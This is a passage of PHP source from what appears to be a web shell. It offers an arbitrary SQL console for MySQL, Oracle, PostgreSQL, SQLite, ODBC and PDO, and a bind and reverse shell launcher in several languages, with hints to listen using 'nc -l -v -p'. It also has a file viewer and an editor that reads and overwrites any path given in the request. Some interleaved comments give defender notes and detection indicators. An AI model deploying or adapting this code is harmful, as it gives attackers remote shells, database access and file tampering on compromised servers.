1172 <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
1173 }
1174 }
1175 }
1176 else $sqls = "SELECT USERNAME FROM SYS.ALL_USERS ORDER BY USERNAME;";
1177
1178 $s_result .= str_replace("__sqltype__","oracle",str_replace("__sqlcode__", $sqls, $sqlform_tpl));
1179 $s_result .= "<div>".$q_result."</div>";
1180 if($con) oci_close($con);
1181 }
1182 elseif(isset($_REQUEST['pgsql']) && ($con = pg_connect("host=$sqlhost user=$sqluser password=$sqlpass port=$sqlport"))){
1183 if(isset($_REQUEST['sqlcode'])){
1184 $sqls = ss($_REQUEST['sqlcode']);
1185 $querys = explode(";",$sqls);
1186
1187 foreach($querys as $query){
1188 if(trim($query) != ""){
1189 $hasil = pg_query($query);
1190 if($hasil){
1191 $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1192 <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
1193 <table class=\"explore\" style=\"width:99%;\"><tr>";
1194 for($i=0;$i<pg_num_fields($hasil);$i++)
1195 $q_result .= "<th>".htmlspecialchars(pg_field_name($hasil,$i))."</th>";
1196 $q_result .= "</tr>";
1197
1198 while($rows=pg_fetch_array($hasil)){
1199 $q_result .= "<tr>";
1200 for($j=0;$j<pg_num_fields($hasil);$j++)
1201 {
1202 if($rows[$j] == "") $dataz = " ";
1203 else $dataz = $rows[$j];
1204 $q_result .= "<td>".htmlspecialchars($dataz)."</td>";
1205 }
1206 $q_result .= "</tr>";
1207 }
1208 $q_result .= "</table>";
1209 }
1210 else $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1211 <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
1212 }
1213 }
1214 }
1215 else $sqls = "SELECT schema_name FROM information_schema.schemata;";
1216
1217 $s_result .= str_replace("__sqltype__","pgsql",str_replace("__sqlcode__", $sqls, $sqlform_tpl));
1218 $s_result .= "<div>".$q_result."</div>";
1219 if($con) pg_close($con);
1220 }
1221 elseif(isset($_REQUEST['sqlite']) && ($con = sqlite_open($sqlite_file))){
1222 if(isset($_REQUEST['sqlcode'])){
1223 $sqls = ss($_REQUEST['sqlcode']);
1224 $querys = explode(";",$sqls);
1225
1226 foreach($querys as $query){
1227 if(trim($query) != ""){
1228 $hasil = sqlite_query($con, $query);
1229 if($hasil){
1230 $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1231 <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
1232 <table class=\"explore\" style=\"width:99%;\"><tr>";
1233 for($i=0;$i<sqlite_num_fields($hasil);$i++)
1234 $q_result .= "<th>".htmlspecialchars(sqlite_field_name($hasil,$i))."</th>";
1235 $q_result .= "</tr>";
1236
1237 while($rows=sqlite_fetch_array($hasil)){
1238 $q_result .= "<tr>";
1239 for($j=0;$j<sqlite_num_fields($hasil);$j++)
1240 {
1241 if($rows[$j] == "") $dataz = " ";
1242 else $dataz = $rows[$j];
1243 $q_result .= "<td>".htmlspecialchars($dataz)."</td>";
1244 }
1245 $q_result .= "</tr>";
1246 }
1247 $q_result .= "</table>";
1248 }
1249 else $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1250 <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
1251 }
1252 }
1253 }
1254 else $sqls = "SELECT name FROM sqlite_master WHERE type='table';";
1255
1256 $s_result .= " <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\">
1257 <input type=\"hidden\" name=\"sqlite_file\" value=\"".$sqlite_file."\" />
1258 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
1259 <textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">".$sqls."</textarea>
1260 <p><input type=\"submit\" name=\"sqlite\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />
1261 Separate multiple commands with a semicolon <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>
1262 </form>";
1263 $s_result .= "<div>".$q_result."</div>";
1264 if($con) sqlite_close($con);
1265 }
1266 elseif(isset($_REQUEST['sqlite3']) && ($con = new SQLite3($sqlite_file))){
1267 if(isset($_REQUEST['sqlcode'])){
1268 $sqls = ss($_REQUEST['sqlcode']);
1269 $querys = explode(";",$sqls);
1270
1271 foreach($querys as $query){
1272 if(trim($query) != ""){
1273 $hasil = $con->query($query);
1274 if($hasil){
1275 $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1276 <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
1277 <table class=\"explore\" style=\"width:99%;\"><tr>";
1278 for($i=0;$i<$hasil->numColumns();$i++)
1279 $q_result .= "<th>".htmlspecialchars($hasil->columnName($i))."</th>";
1280 $q_result .= "</tr>";
1281
1282 while($rows=$hasil->fetchArray()){
1283 $q_result .= "<tr>";
1284 for($j=0;$j<$hasil->numColumns();$j++)
1285 {
1286 if($rows[$j] == "") $dataz = " ";
1287 else $dataz = $rows[$j];
1288 $q_result .= "<td>".htmlspecialchars($dataz)."</td>";
1289 }
1290 $q_result .= "</tr>";
1291 }
1292 $q_result .= "</table>";
1293 }
1294 else $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1295 <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
1296 }
1297 }
1298 }
1299 else $sqls = "SELECT name FROM sqlite_master WHERE type='table';";
1300
1301 $s_result .= " <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\">
1302 <input type=\"hidden\" name=\"sqlite_file\" value=\"".$sqlite_file."\" />
1303 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
1304 <textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">".$sqls."</textarea>
1305 <p><input type=\"submit\" name=\"sqlite3\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />
1306 Separate multiple commands with a semicolon <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>
1307 </form>";
1308 $s_result .= "<div>".$q_result."</div>";
1309 if($con) $con->close();
1310 }
1311 elseif(isset($_REQUEST['odbc']) && ($con = odbc_connect($odbcdsn,$odbcuser,$odbcpass))){
1312 if(isset($_REQUEST['sqlcode'])){
1313 $sqls = ss($_REQUEST['sqlcode']);
1314 $querys = explode(";",$sqls);
1315
1316 foreach($querys as $query){
1317 if(trim($query) != ""){
1318 $hasil = odbc_exec($con, $query);
1319 if($hasil){
1320 $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1321 <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
1322 <table class=\"explore\" style=\"width:99%;\"><tr>";
1323 for($i=1;$i<=odbc_num_fields($hasil);$i++)
1324 $q_result .= "<th>".htmlspecialchars(odbc_field_name($hasil,$i))."</th>";
1325 $q_result .= "</tr>";
1326
1327 while($rows=odbc_fetch_array($hasil)){
1328 $q_result .= "<tr>";
1329 foreach($rows as $r)
1330 {
1331 if($r == "") $dataz = " ";
1332 else $dataz = $r;
1333 $q_result .= "<td>".htmlspecialchars($dataz)."</td>";
1334 }
1335 $q_result .= "</tr>";
1336 }
1337 $q_result .= "</table>";
1338 }
1339 else $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1340 <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
1341 }
1342 }
1343 }
1344 else $sqls = "";
1345
1346 $s_result .= " <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\">
1347 <input type=\"hidden\" name=\"odbcdsn\" value=\"".$odbcdsn."\" />
1348 <input type=\"hidden\" name=\"odbcuser\" value=\"".$odbcuser."\" />
1349 <input type=\"hidden\" name=\"odbcpass\" value=\"".$odbcpass."\" />
1350 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
1351 <textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">".$sqls."</textarea>
1352 <p><input type=\"submit\" name=\"odbc\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />
1353 Separate multiple commands with a semicolon <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>
1354 </form>";
1355 $s_result .= "<div>".$q_result."</div>";
1356 if($con) odbc_close($con);
1357 }
1358 elseif(isset($_REQUEST['pdo'])){
1359 // create object
1360 $mypdo = new PDO($pdodsn,$pdouser,$pdopass);
1361 if(isset($_REQUEST['sqlcode'])){
1362 $sqls = ss($_REQUEST['sqlcode']);
1363 $querys = explode(";",$sqls);
1364
1365 foreach($querys as $query){
1366 if(trim($query) != ""){
1367
1368 if($hasil = $mypdo->query($query)){
1369 $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1370 <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
1371 <table class=\"explore\" style=\"width:99%;\"><tr>";
1372 // workaround to get column name
1373 $r = $hasil->fetch(2);
1374 $savefirstrow = array();
1375 foreach($r as $fn=>$fv){
1376 $q_result .= "<th>".htmlspecialchars($fn)."</th>";
1377 $savefirstrow[] = $fv;
1378 }
1379 $q_result .= "</tr><tr>";
1380 foreach($savefirstrow as $fv){
1381 $q_result .= "<td>".htmlspecialchars($fv)."</td>";
1382 }
1383 $q_result .= "</tr>";
1384 while($rows = $hasil->fetch(2)){
1385 $q_result .= "<tr>";
1386 foreach($rows as $r)
1387 {
1388 if($r == "") $dataz = " ";
1389 else $dataz = $r;
1390 $q_result .= "<td>".htmlspecialchars($dataz)."</td>";
1391 }
1392 $q_result .= "</tr>";
1393 }
1394 $q_result .= "</table>";
1395 }
1396 else{
1397
1398 $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1399 <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
1400 }
1401 $q_result .= "</table>";
1402 }
1403 }
1404 }
1405 else $sqls = "";
1406
1407 $s_result .= " <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\">
1408 <input type=\"hidden\" name=\"pdodsn\" value=\"".$pdodsn."\" />
1409 <input type=\"hidden\" name=\"pdouser\" value=\"".$pdouser."\" />
1410 <input type=\"hidden\" name=\"pdopass\" value=\"".$pdopass."\" />
1411 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
1412 <textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">".$sqls."</textarea>
1413 <p><input type=\"submit\" name=\"pdo\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />
1414 Separate multiple commands with a semicolon <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>
1415 </form>";
1416 $s_result .= "<div>".$q_result."</div>";
1417 }
1418 else{
1419 // sqltype : mysql, mssql, oracle, pgsql, sqlite, sqlite3, odbc, pdo
1420 $sqllist = array();
1421 if(function_exists("mysql_connect")) $sqllist["mysql"] = "connect to MySQL <span style=\"font-size:12px;color:#999;\">- using mysql_*</span>";
1422 if(function_exists("mssql_connect")) $sqllist["mssql"] = "connect to MsSQL <span style=\"font-size:12px;color:#999;\">- using mssql_*</span>";
1423 if(function_exists("sqlsrv_connect")) $sqllist["sqlsrv"] = "connect to MsSQL <span style=\"font-size:12px;color:#999;\">- using sqlsrv_*</span>";
1424 if(function_exists("pg_connect")) $sqllist["pgsql"] = "connect to PostgreSQL <span style=\"font-size:12px;color:#999;\">- using pg_*</span>";
1425 if(function_exists("oci_connect")) $sqllist["oracle"] = "connect to oracle <span style=\"font-size:12px;color:#999;\">- using oci_*</span>";
1426 if(function_exists("sqlite_open")) $sqllist["sqlite"] = "connect to SQLite <span style=\"font-size:12px;color:#999;\">- using sqlite_*</span>";
1427 if(class_exists("SQLite3")) $sqllist["sqlite3"] = "connect to SQLite3 <span style=\"font-size:12px;color:#999;\">- using class SQLite3</span>";
1428 if(function_exists("odbc_connect")) $sqllist["odbc"] = "connect via ODBC <span style=\"font-size:12px;color:#999;\">- using odbc_*</span>";
1429 if(class_exists("PDO")) $sqllist["pdo"] = "connect via PDO <span style=\"font-size:12px;color:#999;\">- using class PDO</span>";
1430
1431 foreach($sqllist as $sqltype=>$sqltitle){
1432 if($sqltype=="odbc"){
1433 $s_result .= "<div class=\"mybox\"><h2>".$sqltitle."</h2>
1434 <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\" />
1435 <table class=\"myboxtbl\">
1436 <tr><td style=\"width:170px;\">DSN / Connection String</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"odbcdsn\" value=\"".$odbcdsn."\" /></td></tr>
1437 <tr><td>Username</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"odbcuser\" value=\"".$odbcuser."\" /></td></tr>
1438 <tr><td>Password</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"password\" name=\"odbcpass\" value=\"\" /></td></tr>
1439 </table>
1440 <input type=\"submit\" name=\"".$sqltype."\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1441 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
1442 </form>
1443 </div>";
1444 }
1445 elseif($sqltype=="pdo"){
1446 $s_result .= "<div class=\"mybox\"><h2>".$sqltitle."</h2>
1447 <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\" />
1448 <table class=\"myboxtbl\">
1449 <tr><td style=\"width:170px;\">DSN / Connection String</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"pdodsn\" value=\"".$pdodsn."\" /></td></tr>
1450 <tr><td>Username</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"pdouser\" value=\"".$pdouser."\" /></td></tr>
1451 <tr><td>Password</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"password\" name=\"pdopass\" value=\"\" /></td></tr>
1452 </table>
1453 <input type=\"submit\" name=\"".$sqltype."\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1454 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
1455 </form>
1456 </div>";
1457 }
1458 elseif($sqltype=="sqlite" || $sqltype=="sqlite3"){
1459 $s_result .= "<div class=\"mybox\"><h2>".$sqltitle."</h2>
1460 <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\" />
1461 <table class=\"myboxtbl\">
1462 <tr><td style=\"width:170px;\">DB File</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlite_file\" value=\"".$sqlite_file."\" /></td></tr>
1463 </table>
1464 <input type=\"submit\" name=\"".$sqltype."\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1465 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
1466 </form>
1467 </div>";
1468 }
1469 else{
1470 $s_result .= "<div class=\"mybox\"><h2>".$sqltitle."</h2>
1471 <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\" />
1472 <table class=\"myboxtbl\">
1473 <tr><td style=\"width:170px;\">Host</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlhost1\" value=\"".$sqlhost."\" /></td></tr>
1474 <tr><td>Username</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqluser\" value=\"".$sqluser."\" /></td></tr>
1475 <tr><td>Password</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"password\" name=\"sqlpass\" value=\"\" /></td></tr>
1476 <tr><td>Port (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlport\" value=\"".$sqlport."\" /></td></tr>
1477 </table>
1478 <input type=\"submit\" name=\"".$sqltype."\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1479 </form>
1480 </div>";
1481 }
1482 }
1483
1484 }
1485 } // bind and reverse shell
// Bind / reverse shell launcher, selected when the request carries an `rs` parameter.
// It lists the variants available on the host (PHP always; Perl, Python and Ruby when
// check_access() reports them; a Windows executable on Windows, C otherwise). When the
// request names one of the `bind_*` / `back_*` keys it hands the port (plus the host
// for the reverse variants) and the matching payload held in the $rs_* variables to
// rs(). check_access(), rs(), the $rs_* payloads, $s_win, $s_server_ip and $s_my_ip
// are all defined outside this excerpt.
// Defender note: request indicators visible here are the parameters `bind_*` /
// `back_*` together with `rshost_<type>` and `rsport_<type>`, and the form's default
// port 13123. On the host, the result would be a listening socket or an outbound
// connection owned by the web-server account. Egress filtering for web servers, and
// alerting on interpreter or compiler child processes of the PHP worker, address both
// variants.
1486 elseif(isset($_REQUEST['rs'])){
1487 // access to compiler/interpreter
1488 $s_python = check_access("python");
1489 $s_perl = check_access("perl");
1490 $s_ruby = check_access("ruby");
1491 $s_gcc = check_access("gcc");
1492 $s_java = check_access("java");
1493 //$s_server_ip = gethostbyname($_SERVER["HTTP_HOST"]);
1494 //$s_my_ip = $_SERVER['REMOTE_ADDR'];
1495 $rshost = $s_server_ip;
1496
// Default port pre-filled in every form below.
1497 $rsport = "13123";
1498 // resources $rs_pl $rs_py $rs_rb $rs_c $rs_win
// Operator hints shown next to the bind ($rspesana) and reverse ($rspesanb) forms.
1499 $rspesana = "Press ' Go ! ' button and run ' nc <i>server_ip</i> <i>port</i> ' on your computer";
1500 $rspesanb = "Run ' nc -l -v -p <i>port</i> ' on your computer and press ' Go ! ' button";
1501
1502 //bind_pl bind_py bind_rb bind_c bind_win bind_php back_pl back_py back_rb back_c back_win back_php
1503 // resources $rs_pl $rs_py $rs_rb $rs_c $rs_win $rs_php
// Menu entries, keyed "<bind|back>_<language>"; the key doubles as the request
// parameter name and as the submit button name.
1504 $rsbind = array();
1505 $rsback = array();
1506
1507
1508 $rsbind["bind_php"] = "Bind Shell <span style=\"font-size:12px;color:#999;\">- php</span>";
1509 $rsback["back_php"] = "Reverse Shell <span style=\"font-size:12px;color:#999;\">- php</span>";
1510
1511 if($s_perl){
1512 $rsbind["bind_pl"] = "Bind Shell <span style=\"font-size:12px;color:#999;\">- perl</span>";
1513 $rsback["back_pl"] = "Reverse Shell <span style=\"font-size:12px;color:#999;\">- perl</span>";
1514 }
1515 if($s_python){
1516 $rsbind["bind_py"] = "Bind Shell <span style=\"font-size:12px;color:#999;\">- python</span>";
1517 $rsback["back_py"] = "Reverse Shell <span style=\"font-size:12px;color:#999;\">- python</span>";
1518 }
1519 if($s_ruby){
1520 $rsbind["bind_rb"] = "Bind Shell <span style=\"font-size:12px;color:#999;\">- ruby</span>";
1521 $rsback["back_rb"] = "Reverse Shell <span style=\"font-size:12px;color:#999;\">- ruby</span>";
1522 }
1523 if($s_win){
1524 $rsbind["bind_win"] = "Bind Shell <span style=\"font-size:12px;color:#999;\">- windows executable</span>";
1525 $rsback["back_win"] = "Reverse Shell <span style=\"font-size:12px;color:#999;\">- windows executable</span>";
1526 }
1527 else{
1528 $rsbind["bind_c"] = "Bind Shell <span style=\"font-size:12px;color:#999;\">- c</span>";
1529 $rsback["back_c"] = "Reverse Shell <span style=\"font-size:12px;color:#999;\">- c</span>";
1530 }
1531
1532 $rslist = array_merge($rsbind,$rsback);
1533
// The page asks for a writable directory, which suggests that rs() writes a file into
// $cwd before running it (rs() is not shown here; confirm against its definition).
// If so, unexpected new files in web-writable directories are a further trace.
1534 if(!is_writable($cwd)) $s_result .= "<p class=\"rs_result\">Directory ".$cwd." is not writable, please change to a writable one</p>";
1535 $rs_err = "";
1536 foreach($rslist as $rstype=>$rstitle){
1537 $split = explode("_",$rstype);
// Per-variant form settings: the bind forms show the server address in a disabled
// field, the reverse forms an editable target address.
1538 if($split[0]=="bind"){
1539 $rspesan = $rspesana;
1540 $rsdisabled = "disabled=\"disabled\"";
1541 $rstarget = $s_server_ip;
1542 $labelip = "Server IP";
1543 }
1544 elseif($split[0]=="back"){
1545 $rspesan = $rspesanb;
1546 $rsdisabled = "";
1547 $rstarget = $s_my_ip;
1548 $labelip = "Target IP";
1549 }
// Runs only for the variant whose key is present in the request.
1550 if(isset($_REQUEST[$rstype])){
1551 if(isset($_REQUEST["rshost_".$rstype])) $rshost_ = ss($_REQUEST["rshost_".$rstype]);
1552 if(isset($_REQUEST["rsport_".$rstype])) $rsport_ = ss($_REQUEST["rsport_".$rstype]);
1553
// The argument handed to rs(): the port alone for bind, "port host" for reverse.
1554 if($split[0]=="bind") $rstarget_packed = $rsport_;
1555 elseif($split[0]=="back") $rstarget_packed = $rsport_." ".$rshost_;
1556
1557 if($split[1]=="pl") $rscode = $rs_pl;
1558 elseif($split[1]=="py") $rscode = $rs_py;
1559 elseif($split[1]=="rb") $rscode = $rs_rb;
1560 elseif($split[1]=="c") $rscode = $rs_c;
1561 elseif($split[1]=="win") $rscode = $rs_win;
1562 elseif($split[1]=="php") $rscode = $rs_php;;
// A non-empty return value from rs() is shown as a message, HTML-escaped.
1563 $buff = rs($rstype,$rstarget_packed,$rscode);
1564 if($buff!="") $rs_err = "<p class=\"rs_result\">".htmlspecialchars($buff)."</p>";
1565 }
1566 $s_result .= "<div class=\"mybox\"><h2>".$rstitle."</h2>
1567 <form action=\"" . $_SERVER['PHP_SELF'] . "?rs\" method=\"post\" />
1568 <table class=\"myboxtbl\">
1569 <tr><td style=\"width:100px;\">".$labelip."</td><td><input ".$rsdisabled." style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rshost_".$rstype."\" value=\"".$rstarget."\" /></td></tr>
1570 <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rsport_".$rstype."\" value=\"".$rsport."\" /></td></tr>
1571 </table>
1572 <input type=\"submit\" name=\"".$rstype."\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1573 <span>".$rspesan."</span>
1574 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
1575 </form>
1576 </div>";
1577 }
// Any message from rs() is placed above the forms.
1578 $s_result = $rs_err.$s_result;
1579 } // view file
// File viewer branch: taken when the request carries a `view` parameter.
// - A regular file gets a metadata table (size, permission, owner, timestamps) with
//   edit / rename / delete links, followed by its content as image, highlighted code or text.
// - A directory is entered with chdir() and listed through showdir().
// ss(), gs(), gp(), cs(), cp(), showdir() and get_archiver_available() are defined outside this excerpt.
// NOTE(review): the path comes from the request, so this branch exposes any file the PHP process
// can read. For log triage, the links built here use the query parameters
// `d`, `view`, `type`, `edit`, `delete` and `img`.
1580 elseif(isset($_REQUEST['view'])){
1581 $f = ss($_REQUEST['view']);
// $fnew is set outside this excerpt, presumably by the rename handler; verify against the full file.
1582 if(isset($fnew) && (trim($fnew)!="")) $f = $fnew;
1583 $owner = "";
1584 if(is_file($f)){
// Owner and group names are only resolved on non-Windows hosts where $s_posix is truthy.
1585 if(!$s_win && $s_posix){
1586 $name = posix_getpwuid(fileowner($f));
1587 $group = posix_getgrgid(filegroup($f));
1588 $owner = "<tr><td>Owner</td><td>".$name['name']."<span class=\"gaya\"> : </span>".$group['name']."</td></tr>";
1589 }
1590 $filn = basename($f);
// The archiver/download markup is a template whose __dlpath__ and __dlcwd__ placeholders are filled in here.
1591 $dlfile = get_archiver_available();
1592 $dlfile = str_replace("__dlpath__",$filn,$dlfile);
1593 $dlfile = str_replace("__dlcwd__",$cwd,$dlfile);
// NOTE(review): $f, $filn and $cwd are concatenated into markup and URLs below without HTML escaping
// or URL encoding. The row labelled "Create time" prints filectime(), which on Unix-like systems is the
// inode change time rather than a creation time, so read it accordingly during forensics.
1594 $s_result .= "<table class=\"viewfile\" style=\"width:100%;\">
1595 <tr><td style=\"width:140px;\">Filename</td><td><span id=\"".cs($filn)."_link\">".$f."</span>
1596 <form action=\"" . $_SERVER['PHP_SELF'] . "?d=".$cwd."&view=".$f."\" method=\"post\" id=\"".cs($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
1597 <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
1598 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
1599 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
1600 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
1601 onclick=\"tukar('".cs($filn)."_link','".cs($filn)."_form');\" />
1602 </form>
1603 </td></tr>
1604 <tr><td>Size</td><td>".gs($f)."</td></tr>
1605 <tr><td>Permission</td><td>".gp($f)."</td></tr>
1606 ".$owner."
1607 <tr><td>Create time</td><td>".date("d-M-Y H:i",filectime($f))."</td></tr>
1608 <tr><td>Last modified</td><td>".date("d-M-Y H:i",filemtime($f))."</td></tr>
1609 <tr><td>Last accessed</td><td>".date("d-M-Y H:i",fileatime($f))."</td></tr>
1610 <tr><td>Actions</td><td>
1611 <a href=\"?d=".$cwd."&edit=".$f."\">edit</a> |
1612 <a href=\"javascript:tukar('".cs($filn)."_link','".cs($filn)."_form');\">rename</a> |
1613 <a href=\"?d=".$cwd."&delete=".$f."\">delete</a> ".$dlfile."
1614 </td></tr>
1615 <tr><td>View</td><td>
1616 <a href=\"?d=".$cwd."&view=".$f."&type=text\">text</a> |
1617 <a href=\"?d=".$cwd."&view=".$f."&type=code\">code</a> |
1618 <a href=\"?d=".$cwd."&view=".$f."&type=image\">image</a></td></tr>
1619 </table>
1620 ";
// Choose a default rendering: "code" when the name ends in "php", "image" when getimagesize()
// recognises the file. An explicit `type` request parameter overrides both.
1621 $t = "";
1622 $iinfo = @getimagesize($f);
1623 if(substr($filn,-3,3) == "php") $t = "code";
1624 if(is_array($iinfo)) $t = 'image';
1625
1626 if(isset($_REQUEST['type'])) $t = ss($_REQUEST['type']);
1627
1628 if($t=="image"){
// Image view: the <img> points back at this script's `img` handler; the displayed width is capped at 800.
// If type=image was forced on a non-image, $iinfo is not an array and the fields read here are empty.
// $imginfo is built but not used anywhere in the visible code.
1629 $width = (int) $iinfo[0];
1630 $height = (int) $iinfo[1];
1631 $imginfo = "Image type = ( ".$iinfo['mime']." )<br />
1632 Image Size = <span class=\"gaul\">( </span>".$width." x ".$height."<span class=\"gaul\"> )</span><br />";
1633 if($width > 800){
1634 $width = 800;
1635 $imglink = "<p><a href=\"?d=".$cwd."&img=".$filn."\" target=\"_blank\">
1636 <span class=\"gaul\">[ </span>view full size<span class=\"gaul\"> ]</span></a></p>";
1637 }
1638 else $imglink = "";
1639
1640 $s_result .= "<div class=\"viewfilecontent\" style=\"text-align:center;\">".$imglink."
1641 <img width=\"".$width."\" src=\"?d=".$cwd."&img=".$filn."\" alt=\"\" style=\"margin:8px auto;padding:0;border:0;\" /></div>";
1642
1643 }
1644 elseif($t=="code"){
// Code view: the file is wrapped at 160 columns, passed through highlight_string(), and five hex
// colours in the resulting HTML are swapped for the page's own palette.
1645 $s_result .= "<div class=\"viewfilecontent\">";
1646 $file = wordwrap(file_get_contents($f),160,"\n",true);
1647 $buff = highlight_string($file,true);
1648 $old = array("0000BB","000000","FF8000","DD0000", "007700");
1649 $new = array("4C83AF","888888", "87DF45", "EEEEEE" , "FF8000");
1650 $buff = str_replace($old,$new, $buff);
1651 $s_result .= $buff;
1652 $s_result .= "</div>";
1653 }
1654 else {
// Plain-text view.
// NOTE(review): as rendered on this page both str_replace() calls replace a character with itself,
// which is a no-op. The original most likely escaped "<" and ">" as HTML entities that were decoded
// when the listing was extracted; confirm against a clean copy before relying on this line.
1655 $s_result .= "<pre style=\"padding: 3px 8px 0 8px;\" class=\"viewfilecontent\">";
1656 $s_result .= str_replace("<","<",str_replace(">",">",(wordwrap(file_get_contents($f),160,"\n",true))));
1657 $s_result .= "</pre>";
1658 }
1659 }
1660 elseif(is_dir($f)){
// A directory was given instead of a file: change into it and show its listing.
1661 chdir($f);
1662 $cwd = cp(getcwd());
1663 $s_result .= showdir($cwd);
1664 }
1665
1666 } // edit file
// File editor branch: taken when the request carries an `edit` parameter.
// Loads the target into a textarea and, when `fcsubmit` is present, overwrites the target with the
// posted `fc` body. ss() and ssc() are defined outside this excerpt.
// NOTE(review): the target path comes from the request and fopen(..., "w") creates or truncates it,
// so any location writable by the PHP process can be modified. The save is a POST carrying
// `edit`, `fc`, `fcsubmit` and `d`; a changed modification time on the target is the on-disk trace.
1667 elseif(isset($_REQUEST['edit'])){
1668 $f = ss($_REQUEST['edit']);
1669 $fc = "";
1670 $fcs = "";
1671
// Pre-fill the editor with the current content when the path is an existing file.
1672 if(is_file($f)) $fc = file_get_contents($f);
1673 if(isset($_REQUEST['fcsubmit'])){
1674 $fc = ssc($_REQUEST['fc']);
// Any fopen() failure is reported as "permission denied", whatever the actual cause.
1675 if($filez = fopen($f,"w")){
1676 $time = date("d-M-Y H:i",time());
1677 if(fwrite($filez,$fc)!==false) $fcs = "file saved <span class=\"gaya\">@</span> ".$time;
1678 else $fcs = "failed to save";
1679 fclose($filez);
1680 }
1681 else $fcs = "permission denied";
1682 }
// Only the file body goes through htmlspecialchars(); $f, $cwd and PHP_SELF are emitted unescaped.
1683 $s_result .= " <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\">
1684 <textarea id=\"fc\" name=\"fc\" class=\"evalcode\">".htmlspecialchars($fc)."</textarea>
1685 <p><input type=\"text\" class=\"inputz\" style=\"width:98%;\" name=\"edit\" value=\"".$f."\" /></p>
1686 <p><input type=\"submit\" name=\"fcsubmit\" class=\"inputzbut\" value=\"Save !\" style=\"width:120px;height:30px;\" />
1687 ".$fcs."</p>
1688 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
1689 </form>
